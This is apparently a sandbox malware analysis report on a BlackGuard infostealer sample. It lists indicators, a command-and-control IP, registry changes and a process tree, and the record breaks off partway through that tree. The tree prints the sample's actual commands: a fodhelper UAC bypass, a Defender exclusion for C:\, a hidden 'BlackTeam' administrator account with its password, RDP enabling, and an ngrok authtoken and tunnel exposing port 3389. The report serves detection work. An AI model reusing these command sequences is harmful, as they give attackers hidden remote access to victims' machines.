Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
01-07-2023 07:01
Static task
static1
Behavioral task
behavioral1
Sample
Build1exe.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
Build1exe.exe
Resource
win10v2004-20230621-en
General
-
Target
Build1exe.exe
-
Size
115KB
-
MD5
bfaa027a645e567824a10a26fb8dbefd
-
SHA1
4ab52a0b1cc105a5462c2255ef84be9af431b82e
-
SHA256
c67b6f45d0beb461838f87ca2ad4774b52d7ccf9b0fa36652e8642dc72f43302
-
SHA512
2f7ab0e4451cfeec017ba294cfcbc6f02d85c756bebce1cf9b3c69f6c77386fe9a21897734c44f4aa32dcaf3a1b7fbaaf0c4639edab1c8961761767a656b4569
-
SSDEEP
1536:ztCbuEYE+9z2wpuFavGmhMnDIhzZtz20tnh/:5CbuAsEFNmhMnDIhNI0tnh/
Malware Config
Extracted
blackguard
http://94.142.138.111
Signatures
-
BlackGuard
Infostealer first seen in Late 2021.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2584 netsh.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" vhttd.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 576 attrib.exe -
Allows Network login with blank passwords 1 TTPs 1 IoCs
Allows local user accounts with blank passwords to access device from the network.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" dtsmsys.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation Build1exe.exe Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation dtsmsys.exe -
Executes dropped EXE 4 IoCs
pid Process 4656 dtsmsys.exe 3860 ngrok.exe 2076 ngrok.exe 3188 vhttd.exe -
Loads dropped DLL 1 IoCs
pid Process 3620 svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000a00000002322b-291.dat upx behavioral2/files/0x000a00000002322b-292.dat upx behavioral2/memory/3188-293-0x0000000000400000-0x0000000000592000-memory.dmp upx behavioral2/files/0x0007000000023275-297.dat upx behavioral2/files/0x0007000000023275-298.dat upx behavioral2/memory/3620-300-0x00007FFEA27E0000-0x00007FFEA2806000-memory.dmp upx behavioral2/memory/3188-301-0x0000000000400000-0x0000000000592000-memory.dmp upx -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 dtsmsys.exe Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 dtsmsys.exe Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 dtsmsys.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\flWyfUU = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dtsmsys.exe\"" dtsmsys.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 31 ip-api.com -
Modifies WinLogon 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" vhttd.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\rfxvmt.dll vhttd.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\RDP Wrapper\rdpwrap.ini vhttd.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll vhttd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 62 Go-http-client/1.1 -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute dtsmsys.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell dtsmsys.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open dtsmsys.exe Key deleted \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell dtsmsys.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings dtsmsys.exe Key deleted \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open dtsmsys.exe Key deleted \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings dtsmsys.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/Snup.bat" dtsmsys.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/ngrok.exe tcp 3389" dtsmsys.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\ = "powershell.exe -command Add-MpPreference -ExclusionPath C:\\" dtsmsys.exe Key deleted \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command dtsmsys.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/vhttd.exe -i" dtsmsys.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command dtsmsys.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\ms-settings\Shell\Open\command\ = "powershell -window hidden -command C:\\Users\\Admin\\AppData\\Local\\Temp\\/ngrok.exe config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV" dtsmsys.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 ngrok.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 ngrok.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 ngrok.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 4656 dtsmsys.exe 4656 dtsmsys.exe 3704 PowerShell.exe 3704 PowerShell.exe 4656 dtsmsys.exe 4788 PowerShell.exe 4788 PowerShell.exe 1748 PowerShell.exe 1748 PowerShell.exe 4896 PowerShell.exe 4896 PowerShell.exe 1716 PowerShell.exe 1716 PowerShell.exe 3620 svchost.exe 3620 svchost.exe 3620 svchost.exe 3620 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 680 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1500 Build1exe.exe Token: SeDebugPrivilege 4656 dtsmsys.exe Token: SeDebugPrivilege 3704 PowerShell.exe Token: SeDebugPrivilege 4788 PowerShell.exe Token: SeIncreaseQuotaPrivilege 2400 WMIC.exe Token: SeSecurityPrivilege 2400 WMIC.exe Token: SeTakeOwnershipPrivilege 2400 WMIC.exe Token: SeLoadDriverPrivilege 2400 WMIC.exe Token: SeSystemProfilePrivilege 2400 WMIC.exe Token: SeSystemtimePrivilege 2400 WMIC.exe Token: SeProfSingleProcessPrivilege 2400 WMIC.exe Token: SeIncBasePriorityPrivilege 2400 WMIC.exe Token: SeCreatePagefilePrivilege 2400 WMIC.exe Token: SeBackupPrivilege 2400 WMIC.exe Token: SeRestorePrivilege 2400 WMIC.exe Token: SeShutdownPrivilege 2400 WMIC.exe Token: SeDebugPrivilege 2400 WMIC.exe Token: SeSystemEnvironmentPrivilege 2400 WMIC.exe Token: SeRemoteShutdownPrivilege 2400 WMIC.exe Token: SeUndockPrivilege 2400 WMIC.exe Token: SeManageVolumePrivilege 2400 WMIC.exe Token: 33 2400 WMIC.exe Token: 34 2400 WMIC.exe Token: 35 2400 WMIC.exe Token: 36 2400 WMIC.exe Token: SeIncreaseQuotaPrivilege 2400 WMIC.exe Token: SeSecurityPrivilege 2400 WMIC.exe Token: SeTakeOwnershipPrivilege 2400 WMIC.exe Token: SeLoadDriverPrivilege 2400 WMIC.exe Token: SeSystemProfilePrivilege 2400 WMIC.exe Token: SeSystemtimePrivilege 2400 WMIC.exe Token: SeProfSingleProcessPrivilege 2400 WMIC.exe Token: SeIncBasePriorityPrivilege 2400 WMIC.exe Token: SeCreatePagefilePrivilege 2400 WMIC.exe Token: SeBackupPrivilege 2400 WMIC.exe Token: SeRestorePrivilege 2400 WMIC.exe Token: SeShutdownPrivilege 2400 WMIC.exe Token: SeDebugPrivilege 2400 WMIC.exe Token: SeSystemEnvironmentPrivilege 2400 WMIC.exe Token: SeRemoteShutdownPrivilege 2400 WMIC.exe Token: SeUndockPrivilege 2400 WMIC.exe Token: SeManageVolumePrivilege 2400 WMIC.exe Token: 33 2400 WMIC.exe Token: 34 2400 WMIC.exe Token: 35 2400 WMIC.exe Token: 36 2400 WMIC.exe Token: SeIncreaseQuotaPrivilege 1008 WMIC.exe Token: SeSecurityPrivilege 1008 WMIC.exe Token: SeTakeOwnershipPrivilege 1008 WMIC.exe Token: SeLoadDriverPrivilege 1008 WMIC.exe Token: SeSystemProfilePrivilege 1008 WMIC.exe Token: SeSystemtimePrivilege 1008 WMIC.exe Token: SeProfSingleProcessPrivilege 1008 WMIC.exe Token: SeIncBasePriorityPrivilege 1008 WMIC.exe Token: SeCreatePagefilePrivilege 1008 WMIC.exe Token: SeBackupPrivilege 1008 WMIC.exe Token: SeRestorePrivilege 1008 WMIC.exe Token: SeShutdownPrivilege 1008 WMIC.exe Token: SeDebugPrivilege 1008 WMIC.exe Token: SeSystemEnvironmentPrivilege 1008 WMIC.exe Token: SeRemoteShutdownPrivilege 1008 WMIC.exe Token: SeUndockPrivilege 1008 WMIC.exe Token: SeManageVolumePrivilege 1008 WMIC.exe Token: 33 1008 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1500 wrote to memory of 4656 1500 Build1exe.exe 92 PID 1500 wrote to memory of 4656 1500 Build1exe.exe 92 PID 4656 wrote to memory of 64 4656 dtsmsys.exe 93 PID 4656 wrote to memory of 64 4656 dtsmsys.exe 93 PID 64 wrote to memory of 3704 64 fodhelper.exe 95 PID 64 wrote to memory of 3704 64 fodhelper.exe 95 PID 4656 wrote to memory of 4396 4656 dtsmsys.exe 97 PID 4656 wrote to memory of 4396 4656 dtsmsys.exe 97 PID 4396 wrote to memory of 4788 4396 fodhelper.exe 99 PID 4396 wrote to memory of 4788 4396 fodhelper.exe 99 PID 4788 wrote to memory of 1216 4788 PowerShell.exe 101 PID 4788 wrote to memory of 1216 4788 PowerShell.exe 101 PID 1216 wrote to memory of 2004 1216 cmd.exe 102 PID 1216 wrote to memory of 2004 1216 cmd.exe 102 PID 2004 wrote to memory of 2400 2004 cmd.exe 103 PID 2004 wrote to memory of 2400 2004 cmd.exe 103 PID 2004 wrote to memory of 2688 2004 cmd.exe 104 PID 2004 wrote to memory of 2688 2004 cmd.exe 104 PID 1216 wrote to memory of 4664 1216 cmd.exe 106 PID 1216 wrote to memory of 4664 1216 cmd.exe 106 PID 4664 wrote to memory of 3484 4664 net.exe 107 PID 4664 wrote to memory of 3484 4664 net.exe 107 PID 1216 wrote to memory of 4076 1216 cmd.exe 108 PID 1216 wrote to memory of 4076 1216 cmd.exe 108 PID 4076 wrote to memory of 4620 4076 net.exe 109 PID 4076 wrote to memory of 4620 4076 net.exe 109 PID 1216 wrote to memory of 1468 1216 cmd.exe 110 PID 1216 wrote to memory of 1468 1216 cmd.exe 110 PID 1468 wrote to memory of 1008 1468 cmd.exe 112 PID 1468 wrote to memory of 1008 1468 cmd.exe 112 PID 1468 wrote to memory of 4128 1468 cmd.exe 111 PID 1468 wrote to memory of 4128 1468 cmd.exe 111 PID 1216 wrote to memory of 2756 1216 cmd.exe 113 PID 1216 wrote to memory of 2756 1216 cmd.exe 113 PID 2756 wrote to memory of 648 2756 net.exe 114 PID 2756 wrote to memory of 648 2756 net.exe 114 PID 1216 wrote to memory of 4208 1216 cmd.exe 115 PID 1216 wrote to memory of 4208 1216 cmd.exe 115 PID 4208 wrote to memory of 2080 4208 net.exe 116 PID 4208 wrote to memory of 2080 4208 net.exe 116 PID 1216 wrote to memory of 4388 1216 cmd.exe 117 PID 1216 wrote to memory of 4388 1216 cmd.exe 117 PID 1216 wrote to memory of 2044 1216 cmd.exe 118 PID 1216 wrote to memory of 2044 1216 cmd.exe 118 PID 1216 wrote to memory of 1452 1216 cmd.exe 119 PID 1216 wrote to memory of 1452 1216 cmd.exe 119 PID 1216 wrote to memory of 5060 1216 cmd.exe 120 PID 1216 wrote to memory of 5060 1216 cmd.exe 120 PID 1216 wrote to memory of 4272 1216 cmd.exe 121 PID 1216 wrote to memory of 4272 1216 cmd.exe 121 PID 1216 wrote to memory of 4336 1216 cmd.exe 122 PID 1216 wrote to memory of 4336 1216 cmd.exe 122 PID 1216 wrote to memory of 576 1216 cmd.exe 123 PID 1216 wrote to memory of 576 1216 cmd.exe 123 PID 4656 wrote to memory of 5100 4656 dtsmsys.exe 124 PID 4656 wrote to memory of 5100 4656 dtsmsys.exe 124 PID 5100 wrote to memory of 1748 5100 fodhelper.exe 125 PID 5100 wrote to memory of 1748 5100 fodhelper.exe 125 PID 1748 wrote to memory of 3860 1748 PowerShell.exe 127 PID 1748 wrote to memory of 3860 1748 PowerShell.exe 127 PID 4656 wrote to memory of 4864 4656 dtsmsys.exe 128 PID 4656 wrote to memory of 4864 4656 dtsmsys.exe 128 PID 4864 wrote to memory of 4896 4864 fodhelper.exe 129 PID 4864 wrote to memory of 4896 4864 fodhelper.exe 129 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 576 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 dtsmsys.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 dtsmsys.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Build1exe.exe"C:\Users\Admin\AppData\Local\Temp\Build1exe.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe"C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe"2⤵
- Allows Network login with blank passwords
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4656 -
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -command Add-MpPreference -ExclusionPath C:\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/Snup.bat4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Snup.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="6⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\System32\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\system32\find.exeFind "="7⤵PID:2688
-
-
-
C:\Windows\system32\net.exenet user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"6⤵
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"7⤵PID:3484
-
-
-
C:\Windows\system32\net.exenet localgroup Administrators BlackTeam /add6⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators BlackTeam /add7⤵PID:4620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="6⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\find.exeFind "="7⤵PID:4128
-
-
C:\Windows\System32\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" BlackTeam /add6⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" BlackTeam /add7⤵PID:648
-
-
-
C:\Windows\system32\net.exenet accounts /forcelogoff:no /maxpwage:unlimited6⤵
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited7⤵PID:2080
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f6⤵PID:4388
-
-
C:\Windows\system32\reg.exereg add "'HKLM\system\CurrentControlSet\Control\Terminal Server'" /v "'fDenyTSConnections'" /t REG_DWORD /d 0x0 /f6⤵PID:2044
-
-
C:\Windows\system32\reg.exereg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxConnectionTime'" /t REG_DWORD /d 0x1 /f6⤵PID:1452
-
-
C:\Windows\system32\reg.exereg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxDisconnectionTime'" /t REG_DWORD /d 0x0 /f6⤵PID:5060
-
-
C:\Windows\system32\reg.exereg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxIdleTime'" /t REG_DWORD /d 0x0 /f6⤵PID:4272
-
-
C:\Windows\system32\reg.exereg add "'HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'" /v BlackTeam /t REG_DWORD /d 0x0 /f6⤵PID:4336
-
-
C:\Windows\system32\attrib.exeattrib C:\users\BlackTeam +r +a +s +h6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:576
-
-
-
-
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Users\Admin\AppData\Local\Temp\ngrok.exe"C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV5⤵
- Executes dropped EXE
PID:3860
-
-
-
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe tcp 33894⤵
- Suspicious behavior: EnumeratesProcesses
